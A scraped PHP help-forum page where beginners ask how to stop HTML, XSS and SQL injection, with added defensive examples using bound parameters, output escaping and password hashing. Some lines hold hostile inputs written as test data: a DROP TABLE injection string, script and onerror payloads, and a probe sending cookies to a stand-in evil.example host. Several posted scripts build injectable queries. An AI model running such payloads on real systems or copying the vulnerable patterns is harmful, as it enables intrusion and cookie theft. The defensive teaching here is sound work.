PHP - My PHP Script Is Letting HTML Injections Through, How Do I Prevent It?
Here is the code that I am using to accept data and display the data.
To accept it and add it to the database I am using:

$comment = $_POST['txtcomment'];
$comment = @mysql_real_escape_string($comment);

To display the data from the DB I am using:

$comment = $rowscomment['comment'];
<?php echo nl2br($comment); ?>

Please help me correct it. I am still learning PHP.

Similar Tutorials

I am having problems with a search feature I am using for a website I am building. Everything was working fine when I was testing on my local machine using EasyPHP 3.0. The issue I am having is that once I uploaded the site to a "live" server and tested it, my search function wouldn't work. The issue resides in the two lines with the magic quotes and the real escape string; for some reason those lines worked fine while testing using EasyPHP 3.0, but now I must delete those lines in order for my search function to work. The problem is that deleting those lines makes me vulnerable to an SQL injection. I have tried deleting just the magic quotes line and everything works properly, but then I am not seeing any kind of slash stripping/sanitizing when I enter a statement like this into my search: a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't. Any help on this issue would be greatly appreciated!

//get data
$button = $_GET['submit'];
if (get_magic_quotes_gpc() == 0) {
    $search = mysql_real_escape_string($_GET['search']); // clean up the search string
} else {
    $search = $_GET['search'];
}
$limit = 9;
$page = $_GET['page'];
if ($page) $start = ($page - 1) * $limit;

I also tried using mysql_real_escape_string on my construct, but I get syntax errors because of the | being used before and after the $search_each. That | character must remain in place in order for my search to work the way I want it to.
$x++;
if ($x == 1)
    $construct .= "keywords LIKE '%".mysql_real_escape_string(|$search_each|)."%'";
else
    $construct .= "AND keywords LIKE '%|$search_each|%'";
}

I'd like to use a text editor like this one: http://tinymce.moxiecode.com/examples/full.php for my forums. But I am not sure exactly how I would prevent abuse and injections from messing up the page, rather than being contained in the designated area it is meant for. Could someone please help me? I know htmlspecialchars will not work, since some of the code needs to render as HTML.

Hello all, A simple question: I have an HTML application from which a PHP script is executed. The 'GET' method is used and no form is submitted. I was wondering if there is a way to prevent users from running this PHP script directly in the browser. Thank you all for your suggestions, Mamer

Hi all, I am trying to make an email script with PEAR to send quite a few people a personalized message. But I thought this could very well cause the script to time out. Now I read http://php.net/manual/en/function.set-time-limit.php, but I thought maybe someone knows a way to prevent a time out instead of setting the time limit to a larger amount. Some terms I saw floating around were ob_start, flush, sleep and a few others, but I really never worked with these. If someone could point me in the right direction of thinking or maybe knows a tutorial or guide, I really would love to hear it. Thank you!

Hi guys, For a project I made sort of a custom cron database. The database has 4 columns: ID (auto increment), TaskID, DateTime, Locked. I'm running a 1 minute cron in the form of a PHP script. The script itself starts with a query that loads a task with Locked != 'Y' and DateTime < NOW(). It then locks the task (by flagging the 'Locked' field in the db) and launches another script that finishes it. That last script deletes the task from the cron database when it is finished.
Problem is, at certain peak hours, the system would get laggy; there'd be a bunch of tasks stacking up and it would get behind on the schedule. In order to combat that, I made an extra 1 minute cron, launching the same script. Now, my problem: mysql is too slow. In principle, there shouldn't be any problem: all tasks picked up by either instance of the script would be locked so the other instance wouldn't be able to pick up the same task. The problem occurs when both instances are booted at the same time (well, one after the other but with a minuscule time difference between them) and they both at the same time run the query to get a 'free' task from the database: the system will give them both the same task before either of the script instances has the time to lock it up. I'm trying to think of some solutions but I'd like your feedback on what solution would be best.

- Putting an exclusive lock on the PHP file is not an option for me since I still want to run the script; I just need it to pick up an exclusive task.
- Other option: having the script open with a random sleep of (1, 10) seconds; it will have the script instances pick up a task at a different time, giving the other instance time to lock it up. Obvious disadvantage: I'm losing time.
- Using a file as a flag. Set a directory and create a file in it. Check if this is the only file in the dir; if yes: start right away. Otherwise: go to sleep for 2 seconds (should be plenty of time to run 2 queries in the other instance). What is the fastest method of doing a directory scan though, glob()?

My question: what's the fastest/best way to solve this? Thanks!

My host has a limit of 100 emails per hour and this is now being reached too many times a day, and some emails are not being sent due to this. Does anyone have a script or know of one that can stack emails to be sent in MySQL or something and every 5 minutes send one out from the stack and then delete from the stack the ones sent?
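For the first post on this page (mysql_real_escape_string on the way in, nl2br on the way out), the following is an added example and not the poster's code. It shows that escaping for SQL does nothing to HTML, and that the fix is htmlspecialchars() at output time, applied before nl2br(). The function names and the comment text are constructed for the demonstration; addslashes() stands in for mysql_real_escape_string() so the file runs without a database connection.

```php
<?php
// Added example for the first post; not the poster's code.
declare(strict_types=1);

// What the poster does today: escape for SQL on the way in, nl2br() on the way
// out. addslashes() stands in for mysql_real_escape_string() here (both only
// touch quotes, backslashes and NUL) so this file runs without a database.
function renderCommentOriginal(string $comment): string
{
    $stored = addslashes($comment);   // what reaches the database
    return nl2br($stored);            // what reaches the browser
}

// The fix: store the comment as typed (with a bound parameter in the real code)
// and encode it for the HTML context when it is printed. Escaping must happen
// before nl2br(); otherwise the <br /> tags nl2br() emits get encoded as well.
function renderComment(string $comment): string
{
    return nl2br(htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

// Constructed hostile comment: an HTML tag plus a newline, as a visitor might post it.
$comment = "nice site\n<script>alert(document.cookie)</script>";

echo renderCommentOriginal($comment), "\n";
// nice site<br />
// <script>alert(document.cookie)</script>   <- tag intact: SQL escaping touches no HTML metacharacter

echo renderComment($comment), "\n";
// nice site<br />
// &lt;script&gt;alert(document.cookie)&lt;/script&gt;

// Wrong order, for comparison: the <br /> that nl2br() inserted is itself
// encoded and is displayed to the reader as the literal text "<br />".
echo htmlspecialchars(nl2br($comment), ENT_QUOTES, 'UTF-8'), "\n";
// nice site&lt;br /&gt;
// &lt;script&gt;alert(document.cookie)&lt;/script&gt;
```

The escaping belongs at the point of output because it depends on the context the data is printed into: htmlspecialchars() is right for HTML text and quoted attribute values, but a value placed inside a script block or a URL needs that context's own encoding.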
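For the two-instance cron post above, and equally for the post asking for a MySQL mail stack drained a few messages at a time, the following added example (not the poster's script) claims one due task with a single UPDATE instead of a SELECT followed by an UPDATE, which is the window the two instances race through. It assumes MySQL with InnoDB, the poster's column names (ID, TaskID, DateTime, Locked) in a table called cron_tasks here, plus an added Worker VARCHAR(64) column; the DSN and credentials are placeholders and runTask() stands in for the poster's second script.

```php
<?php
// Added example for the cron race post; not the poster's script.
// Assumes MySQL/InnoDB; table and credentials below are placeholders.
declare(strict_types=1);

$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

// Claim one due task atomically. Both cron instances run this UPDATE: InnoDB
// locks the candidate row for whichever instance gets there first, the other
// waits, re-evaluates the WHERE clause once the lock is released, now sees
// Locked='Y' on that row and takes the next one instead. The random token
// tells us afterwards which row we won, without a second racing SELECT.
function claimTask(PDO $pdo): ?array
{
    $token = bin2hex(random_bytes(16));
    $claim = $pdo->prepare(
        "UPDATE cron_tasks SET Locked = 'Y', Worker = :w
         WHERE Locked <> 'Y' AND `DateTime` < NOW()
         ORDER BY `DateTime` LIMIT 1"
    );
    $claim->execute([':w' => $token]);
    if ($claim->rowCount() === 0) {
        return null;  // nothing due, or the other instance took the last one
    }
    $row = $pdo->prepare("SELECT ID, TaskID FROM cron_tasks WHERE Worker = :w AND Locked = 'Y'");
    $row->execute([':w' => $token]);
    return $row->fetch(PDO::FETCH_ASSOC) ?: null;
}

function finishTask(PDO $pdo, int $id): void
{
    $pdo->prepare('DELETE FROM cron_tasks WHERE ID = :id')->execute([':id' => $id]);
}

// Stand-in for the poster's second script, which does the real work.
function runTask(int $taskId): void
{
    error_log("running task $taskId");
}

// One cron tick: keep claiming until nothing is due, so a backlog built up at
// peak hours is drained by one instance and a second instance is optional.
while (($task = claimTask($pdo)) !== null) {
    runTask((int) $task['TaskID']);
    finishTask($pdo, (int) $task['ID']);
}
```

The same claim works for an outgoing-mail queue: keep a counter in the loop and stop after the number of messages the host allows per run. On MySQL 8 the equivalent pattern is SELECT ... FOR UPDATE SKIP LOCKED inside a transaction, which lets several workers pick different rows without waiting on each other's locks.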
I am trying to protect my guestbook entries from injections such as HTML, XSS, and MySQL injections. My PHP knowledge is very little. If possible, can I have some help please with protecting my entries? I have a few bits and pieces of code to protect my guestbook from injections that I got from some tutorials that I was reading.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Author: Reality Software
Website: http://www.realitysoftware.ca
Note: This is a free template released under the Creative Commons Attribution 3.0 license, which means you can use it in any way you want provided you keep the link to the author intact.
-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!-- header -->
<div id="header">
  <div id="logo"><a href="index.html">Header</a></div>
  <div id="menu">
    <ul>
      <li><a href="index.html">Home</a></li>
      <li><a href="">Link 1</a></li>
      <li><a href="">Link 2</a></li>
      <li><a href="">Link 3</a></li>
      <li><a href="">Contact</a></li>
      <li><a href="guestbook.php">Guestbook</a></li>
    </ul>
  </div>
</div>
<div id="icon"><a href="twitter.com/"><img border="0" src="http://www.000webhost.com/forum/images/twitter.png" alt="twitter" width="58px;" height="53px;" /></a></div>
<!--end header -->
<!-- main -->
<div id="main">
<div id="content">
<div id="text">
<h1><strong>Guestbook</strong></h1>
</div>
<?php
$input = is_numeric($input) ?
    intval($input) : mysql_real_escape_string($input);

function sanitizeString($string) {
    return htmlentities((string) $string, ENT_COMPAT, "UTF-8");
}

$preparedStatement = $db->prepare('SELECT * FROM guestbook WHERE name = :name');
$preparedStatement->execute(array(':name' => $name));
$rows = $preparedStatement->fetchAll();

$mysql_host = "localhost";
$mysql_database = "a7560006_guest";
$mysql_user = "a7560006_host";
$mysql_password = "mypassword";

// Connect to server and select database.
mysql_connect("$mysql_host", "$mysql_user", "$mysql_password") or die("cannot connect server");
mysql_select_db("$mysql_database") or die("cannot select DB");

$tbl_name = "guestbook"; // Table name

$name = ($_POST['name']);
$comment = ($_POST['comment']);
$comment = stripslashes($comment);
$name = stripslashes($name);
$comment = str_replace("<", "&lt;", $comment);
$name = str_replace("<", "&lt;", $name);
$datetime = date("M-d-Y h:i:s A"); //date time
$verif_box = ($_POST['verif_box']);

if (md5($verif_box).'a4xn' != $_COOKIE['tntcon']) {
?>
<table width="400" border="0" align="center">
<tr><td align="center"><h4>You have not entered captcha or entered incorrect captcha!</h4></td></tr>
</table>
</div>
<!-- footer -->
<div id="footer">
  <div id="left_footer">© Copyright 2011<strong> Author </strong></div>
  <div id="right_footer">
    <!-- Please do not change or delete this link. Read the license! Thanks. :-) -->
    Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a>
  </div>
</div>
<!-- end footer -->
</div>
<!-- end main -->
</body>
</html>
<?
exit;
}

if (empty($name) || empty($comment)) {
?>
<table width="400" border="0" align="center">
<tr><td align="center"><h3>Sorry, all fields are required!</h3></td></tr>
</table>
<?
} else {
    $sql = "INSERT INTO $tbl_name (name, comment, datetime) VALUES ('$name', '$comment', '$datetime')";
    $result = mysql_query($sql);
    //check if query successful
    if ($result) {
?>
<table width="400" border="0" align="center">
<tr><td align="center"><h3>Thank you for signing my guestbook!</h3></td></tr>
</table>
<?
        echo "<meta http-equiv='Refresh' content='1; URL=viewguestbook.php'>"; // link to view guestbook page
    } else {
        echo "ERROR";
    }
    mysql_close();
}
?>
</div>
<!-- footer -->
<div id="footer">
  <div id="left_footer">© Copyright 2011<strong> Author </strong></div>
  <div id="right_footer">
    <!-- Please do not change or delete this link. Read the license! Thanks. :-) -->
    Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a>
  </div>
</div>
<!-- end footer -->
</div>
<!-- end main -->
</body>
</html>

Hi everyone, I have been the victim (at least I think) of SQL injection attacks!? I believe this as my contact us db table is full of 1's. How can I stop this from happening? Here's the contact form:

Code:
<form method="get" action="contact-send.php">
Name:<br />
<input type="text" name="name" id="name" size="30" /><br />
Email:<br />
<input type="email" name="email" id="email" size="30" /><br />
Your Question:<br />
<textarea name="question" id="question" rows="10" cols="50"></textarea><br />
<input type="submit" name="submit" value="send" />
</form>

And here's the script 'contact-send.php':

Code:
<?PHP
session_start();
include ('php only scripts/db.php');
if (isset($_POST['submit'])) {
    $name = $_POST['name'];
    $email = $_POST['email'];
    $question = $_POST['question'];
    //your code to insert variables into db can go here or after the if statement
    $query = "INSERT INTO contact_us (name, email, questions) VALUES ('" .$name. "', '" .$email. "', '" .$question. "')";
    $result = mysql_query($query) or die(mysql_error());
    echo $name."<br/>".$email."<br/>".$question;
}
header('Location: http://www.removalspace.com/contactconf.php');
?>

Do I have to have if(isset on EACH variable? Like on name, email and question too?

Hello, I have been using preg_match() to throw out invalid form characters and then both mysql_real_escape_string() and stripslashes() to escape data variables before using them with MySQL. But how about messages from a text area, for example on a contact form? You can't limit the characters for the user. Is escaping variables good enough to eliminate SQL injections from user input?

Hi, how much bandwidth is used for 1000 downloads per day or for each download? Is it safe to have no download limits? Thanks
One more question. So I have a function with two parameters, $x and $y. Here it is.

Code:
function dydx($x, $y) {
    $equation = 2 * $x;
    return $equation;
}

Now here's the problem. I want $equation to be user defined. Easy enough, I use a post command and I get $equation to equal whatever the user inputs. The problem is that if I get input from the user, I'm not sure how to take that input and then have the function parameters work on it. Like if the user inputs "3*$x + 2*$y", I want to be able to let the parameters for the function dydx act on it. How could I go about doing this?

htmlspecialchars($str, ENT_QUOTES, 'UTF-8');

Using this code with UTF-8. I need someone to help craft up some small XSS injections with this. I heard htmlspecialchars doesn't stop all XSS attacks, so I'm wondering what's the most XSS attack you can craft to load a simple cookie loader. (Basically, just simple JavaScript injection is all I'm trying to find, because people can use cookie loaders with it, and yeah, that's not good.) Looking for your code to be posted, and once it is, I'll copy it and submit it through the code I posted above and see if there are any vulnerabilities. (On my localhost server.) Thanks! $str = user input. Oh, and here is the BBCODE regex that the code passes through before this function is returned on the text.
$text = preg_replace( "#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text );
$text = preg_replace( "#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text );
$text = preg_replace( "#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text );
$text = preg_replace( "#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text );
//Spoiler
$text = preg_replace( "#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text );
//Beautiful Colors
$text = preg_replace( "%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
$text = preg_replace( "%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );

If anyone can craft up an XSS for this, I'd appreciate it. Because I need this to be secure.

Edited by Monkuar, 10 January 2015 - 06:33 PM.

Basically, I have the following code ($c2 is my connection variable):

Code:
$rid = $_GET['id'];
$q = mysql_query("SELECT * FROM reports WHERE id = $rid", $c2) or die(mysql_error());
$report = mysql_fetch_array($q);

$report is used later on to gather more information that is output to the user. However, if in the URL someone were to put id=1', they would have an error message spat out to them (something along the lines of: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1), indicating a SQL injection exploit. How would I go about fixing this, and also preventing SQL injection? Thanks a bunch, Mark

I have an index HTML form that has a JavaScript link and action='xyz.php'. Everything works fine. I've seen PHP scripts with an HTML form after the closing tag ?> and they work. Yet when I included my HTML form after my PHP code, some of my JS stopped working. What are the protocols for combining PHP and HTML? Which should run first? When is the action run?
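The guestbook post, the contact-form post ("my table is full of 1's"), the question about escaping text-area input and the reports post (id=1' producing a MySQL syntax error) all have the same fix: build every query with bound parameters and validate each field before the query is touched. The following is an added example, not code from any of the posts. SQLite in memory stands in for the posters' MySQL databases so the file runs on its own; with a mysql: DSN the two functions are unchanged. Table and column names follow the posts; saveContact() and loadReport() are names chosen here. Two things visible in the posts are worth noting on the side: the contact form submits with method="get" while contact-send.php reads $_POST, so its isset($_POST['submit']) branch never runs for that form; and the syntax error the reports post sees is printed by or die(mysql_error()), so database errors should be logged rather than echoed to the visitor.

```php
<?php
// Added example for the SQL injection posts; not code from any of the posts.
// SQLite in memory stands in for MySQL so the file runs stand-alone.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE contact_us (id INTEGER PRIMARY KEY, name TEXT, email TEXT, questions TEXT)');
$pdo->exec('CREATE TABLE reports (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO reports (id, title) VALUES (1, 'first'), (2, 'second')");  // constructed rows

// Contact form handler. Every field is checked for presence and shape before
// the query is built, and the query text itself never contains user data, so
// a quote or a semicolon in a free-text field is stored as just that.
function saveContact(PDO $pdo, array $post): ?string
{
    foreach (['name', 'email', 'question'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || trim($post[$field]) === '') {
            return "Missing field: $field";
        }
    }
    if (filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        return 'Invalid e-mail address';
    }
    if (strlen($post['question']) > 4000) {
        return 'Question too long';
    }
    $stmt = $pdo->prepare('INSERT INTO contact_us (name, email, questions) VALUES (:name, :email, :q)');
    $stmt->execute([':name' => $post['name'], ':email' => $post['email'], ':q' => $post['question']]);
    return null;  // no error
}

// Reports lookup. The id is validated as a positive integer and bound as one;
// a value such as "1'" is rejected before any SQL is parsed, so there is no
// syntax error to leak and nothing for the attacker to complete.
function loadReport(PDO $pdo, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, title FROM reports WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Constructed inputs: a real submission carrying the injection string from the
// search post in its free-text field, a bad address, and the reports probe.
var_dump(saveContact($pdo, [
    'name' => 'Ann', 'email' => 'ann@example.org',
    'question' => "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't",
]));                                                                        // NULL: stored verbatim
var_dump(saveContact($pdo, ['name' => 'Ann', 'email' => 'not-an-address', 'question' => 'hi']));
                                                                            // string(22) "Invalid e-mail address"
var_dump($pdo->query('SELECT questions FROM contact_us')->fetchColumn());   // the injection string, as text
var_dump(loadReport($pdo, "1'"));                                           // NULL
var_dump(loadReport($pdo, '2'));                                            // array(2) { ["id"]=> int(2) ["title"]=> string(6) "second" }
```

The answer to "do I need isset on each variable?" is the loop at the top of saveContact(): presence, type and emptiness are checked per field, and the check is the place to enforce lengths as well. Escaping functions are not needed once the values travel as parameters; they are only ever correct for the one context (MySQL string literals) they were written for.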
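For the htmlspecialchars plus BBCode post, the following added self-check (not the poster's code beyond the regex lines, which are copied from the post) applies htmlspecialchars() first and the BBCode pass second, runs a few constructed XSS probes through the pipeline, and reports any tag in the output that the BBCode pass could not have emitted. It is a regression check for the pipeline rather than a proof: a looser colour regex or a reversed order of the two steps would show up as a failure.

```php
<?php
// Added self-check for the htmlspecialchars + BBCode post. The regex lines are
// the poster's; the function names and the probes are constructed here.
declare(strict_types=1);

// The poster's BBCode pass, verbatim.
function bbcode(string $text): string
{
    $text = preg_replace("#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text);
    $text = preg_replace("#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text);
    $text = preg_replace("#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text);
    $text = preg_replace("#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text);
    $text = preg_replace("#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text);
    $text = preg_replace("%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text);
    $text = preg_replace("%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text);
    return $text;
}

// Escape first, then BBCode: every <, >, ", ' and & typed by the user becomes an
// entity, so the only tags in the result are the ones the BBCode pass emits.
function render(string $userInput): string
{
    return bbcode(htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8'));
}

// Exact tags the BBCode pass can emit. The colour value uses the same character
// classes the poster's regex accepts, so loosening that regex fails the check.
const ALLOWED_TAG = '#^(<span class=\'b\'>|</span>|<i>|</i>|<u>|</u>|<s>|</s>'
    . '|<div style=\'text-align:right\'>|</div>'
    . '|<span style="color: (?:[a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3}|rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))">)$#';

// Tags present in $html that the BBCode pass could not have produced.
function unexpectedTags(string $html): array
{
    preg_match_all('#<[^>]*>#', $html, $m);
    return array_values(array_filter($m[0], fn (string $tag) => !preg_match(ALLOWED_TAG, $tag)));
}

// Constructed probes: raw tag, attribute breakout, a BBCode value that tries to
// close the style attribute, a tag inside a BBCode span, and a closing-div trick.
$probes = [
    '<script>document.location="http://evil.example/?"+document.cookie</script>',
    '"><img src=x onerror=alert(1)>',
    '[color=red" onmouseover="alert(1)]x[/color]',
    '[b]<svg/onload=alert(1)>[/b]',
    '[color=#fff]x[/color][right]</div><script>alert(1)</script>[/right]',
];

foreach ($probes as $probe) {
    $bad = unexpectedTags(render($probe));
    printf("%-4s %s\n", $bad ? 'LEAK' : 'ok', $probe);
}
// All five lines print "ok": no probe yields a tag the BBCode pass did not emit.

// Reversed order, for comparison: the BBCode output is escaped as well, so the
// formatting is lost and [b]bold[/b] is displayed as literal "<span ...>" text.
echo htmlspecialchars(bbcode('[b]bold[/b]'), ENT_QUOTES, 'UTF-8'), "\n";
// &lt;span class=&#039;b&#039;&gt;bold&lt;/span&gt;
```

The check covers the HTML text and attribute contexts only, which is where this pipeline puts user data; if the rendered text is ever placed inside a script block, a URL or an inline event handler, that context needs its own encoding and this harness says nothing about it.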
Hey, I need help with my PHP script.
It needs to check the database, but now it only checks if the fields are not empty,
and I don't know what I need to add. I hope that you can help me.
<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $username = trim(htmlentities(mysql_real_escape_string($_POST['username'])));
    $password = trim(htmlentities(mysql_real_escape_string($_POST['password'])));
    if (!empty($username) && !empty($password)) {
        $_SESSION['username'] = $username;
        echo "<br/> welcome ", $username;
    } else {
        echo "Please enter correct username or password";
    }
} else {
    echo "please Login";
}
?>
<h1>Login</h1>
<form ACTION="<?php echo $loginFormAction; ?>" METHOD="POST" name="login_form">
<label>Username:<br/></label>
<input type="text" name="username"><br/>
<label>Password:<br/></label>
<input type="password" name="password"><br/>
<input type="submit" value="Login">
<a href="../register">register</a>
</form>

Hiya! I need to create a simple PDF script that will always create A4 documents. I need the content to be controlled using HTML and CSS. Where do you start in creating such a script? Any help is greatly received.

Hi,
I am having problems trying to either include a PHP file or execute a PHP script within a <div with a class> which I use for a drop down menu; every bit of help much appreciated, thanks.. singhy
<h2 class="hidenextdiv"><a href="#">dropdown menu1</a></h2>
<div class="another dropmenuclass">
<h3>Test</h3>
want to add my php working code here, have tried includes but no joy, it either breaks the dropdown menu or I am not getting the results back from the database, my script works ok, have tested it separately.
<h3> </h3>
<div style="clear: both;"> </div>
</div>

I was wondering if anyone is aware of a PHP script that can pull HTML from an external site and create a local page with all the URLs and image paths rewritten to local paths. I'm trying to create a module for Drupal that does this. Any script already written that I can adapt to Drupal would be great. If no one is aware of a current script that does this, can anyone point me in the right direction?
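For the login post above (the script that only tests that username and password are non-empty), the following added example, not the poster's script, looks the user up with a bound parameter and compares the submitted password with password_verify() against a stored password_hash(). One detail of the posted script matters here: trim(htmlentities(mysql_real_escape_string(...))) changes the password before it is compared, so a password containing a quote, an ampersand or a leading space would never match; the example passes the password through untouched, since it is only ever hashed. SQLite in memory stands in for MySQL, and the seeded account "alice" is constructed.

```php
<?php
// Added example for the login post; not the poster's script.
// SQLite in memory stands in for MySQL; the seeded account is constructed.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE NOT NULL, password_hash TEXT NOT NULL)');
$pdo->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)')
    ->execute([':u' => 'alice', ':h' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

// Looks the user up and checks the password. Returns the user id on success, null otherwise.
function authenticate(PDO $pdo, string $username, string $password): ?int
{
    static $dummyHash = null;
    $dummyHash ??= password_hash('unused', PASSWORD_DEFAULT);

    $stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    // Always run password_verify(), against a dummy hash when the user does not
    // exist, so the response time does not reveal which usernames are valid.
    $ok = password_verify($password, $user ? $user['password_hash'] : $dummyHash);
    return ($ok && $user) ? (int) $user['id'] : null;
}

// Form handler. The username is trimmed; the password is neither trimmed nor
// escaped, because it is only hashed and escaping would change what is compared.
function handleLogin(PDO $pdo, array $post): string
{
    $username = trim((string) ($post['username'] ?? ''));
    $password = (string) ($post['password'] ?? '');
    if ($username === '' || $password === '') {
        return 'Please enter your username and password';
    }
    $id = authenticate($pdo, $username, $password);
    if ($id === null) {
        return 'Incorrect username or password';  // same message for unknown user and wrong password
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);             // fresh session id once the user is authenticated
        $_SESSION['user_id'] = $id;
    }
    return 'Welcome, ' . htmlspecialchars($username, ENT_QUOTES, 'UTF-8');
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    session_start();
    echo handleLogin($pdo, $_POST);
} else {
    // Constructed submissions so the file can be run from the command line.
    echo handleLogin($pdo, ['username' => 'alice', 'password' => 'correct horse battery staple']), "\n"; // Welcome, alice
    echo handleLogin($pdo, ['username' => 'alice', 'password' => 'wrong']), "\n";                        // Incorrect username or password
    echo handleLogin($pdo, ['username' => "alice' OR '1'='1", 'password' => 'x']), "\n";                 // Incorrect username or password
}
```

The session value stored on success is the user id rather than the typed username, and the welcome line is escaped on output, so a username like <b>alice</b> is displayed rather than rendered.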